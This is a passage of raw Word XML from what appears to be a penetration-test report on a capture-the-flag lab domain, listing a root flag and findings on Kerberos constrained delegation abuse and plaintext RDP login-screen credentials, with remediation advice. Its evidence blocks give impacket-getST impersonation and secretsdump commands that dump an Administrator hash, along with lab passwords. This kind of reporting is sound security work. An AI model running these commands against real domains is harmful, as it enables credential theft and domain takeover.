              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3191"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Root flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3162"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E7D32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>THM{Cr0ccCrewStr1kes!}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2458" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="F1F8F1" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="5B6472"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>C:\PerfLogs\Admin\root.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc234251551"/>
      <w:r>
        <w:rPr/>
        <w:t>5. Technical Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>Findings are ordered by severity. Each includes a description, supporting evidence, business risk, and prioritized remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc234251552"/>
      <w:r>
        <w:rPr/>
        <w:t>Finding 1: Kerberos Constrained Delegation Abuse Leading to Domain Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="0" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="60" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="2201"/>
        <w:gridCol w:w="5460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="7A1620" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>CRITICAL</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2201" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5460" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Enumeration via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>impacket-findDelegation</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> reported that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account was configured with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constrained Delegation with Protocol Transition</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUSTED_TO_AUTH_FOR_DELEGATION</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> flag) toward </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>oakley/DC.COOCTUS.CORP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> and its SPN variants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Protocol transition (S4U2Self) lets the account request a service ticket to itself on behalf of an arbitrary user and receive it in forwardable form; S4U2Proxy then forwards that identity to the delegated service. Because the impersonated principal is attacker-controlled, the assessor requested a ticket as the Domain Administrator. impacket-getST performed the S4U2Self then S4U2Proxy exchange and produced a usable Administrator ticket, which was presented to the Domain Controller to perform a DCSync and extract domain credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B0341D"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This is Kerberos Constrained Delegation (KCD / S4U), not Resource-Based Constrained Delegation (RBCD). RBCD abuses the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>msDS-AllowedToActOnBehalfOfOtherIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> attribute written on a target object; the issue here is the delegation configured on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account itself (its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>msDS-AllowedToDelegateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> list plus the protocol-transition flag). The distinction matters for accurate remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</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impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate Administrator \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"COOCTUS.CORP/password-reset:resetpassword" -dc-ip 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>export KRB5CCNAME="Administrator@oakley_DC.COOCTUS.CORP@COOCTUS.CORP.ccache"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>impacket-secretsdump -k -no-pass DC.COOCTUS.CORP -just-dc-user Administrator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Administrator:500:...:add41095f1fb0405b32f70a489de022d:::</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Business Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This misconfiguration is directly exploitable for full domain takeover. An attacker who compromises the delegated account - as demonstrated - can impersonate any user, including Domain Admins, and gain complete control over the directory, all hosts, and all data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Conduct a full audit of every account and computer object holding delegation rights (both classic and resource-based).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove protocol transition (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUSTED_TO_AUTH_FOR_DELEGATION</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">) and tightly scope or remove the delegation on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>msDS-AllowedToDelegateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). Delegation should never target services on a Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Add all Domain Administrators and other Tier-0 accounts to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protected Users</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> security group, and enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“Account is sensitive and cannot be delegated.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Rotate the krbtgt account password (twice) and all high-value credentials, as domain hashes were exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="8" w:color="C7CEDA"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc234251553"/>
      <w:r>
        <w:rPr/>
        <w:t>Finding 2: Plaintext Credentials Exposed on RDP Login Screen</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="30" w:type="dxa"/>
          <w:start w:w="0" w:type="dxa"/>
          <w:bottom w:w="30" w:type="dxa"/>
          <w:end w:w="60" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1699"/>
        <w:gridCol w:w="2201"/>
        <w:gridCol w:w="5460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1699" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B0341D" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>HIGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2201" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS 3.1: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5460" w:type="dxa"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:top w:w="70" w:type="dxa"/>
              <w:start w:w="110" w:type="dxa"/>
              <w:bottom w:w="70" w:type="dxa"/>
              <w:end w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="5B6472"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">A connection to the target over RDP (port 3389) revealed a customized Windows login screen containing a graphical “sticky note” with the plaintext username and password for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visitor</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GuestLogin!</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). This provided the authentication needed to query LDAP, enumerate SMB shares, and pivot into the domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Evidence</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rdesktop -f -u "" 10.64.148.30</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># Login screen displays: Visitor / GuestLogin!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5B6472"/>
        </w:rPr>
        <w:t>See Figures 6–7 in section 3.3 for the RDP session and the sticky-note credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="150" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5AAC"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Business Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
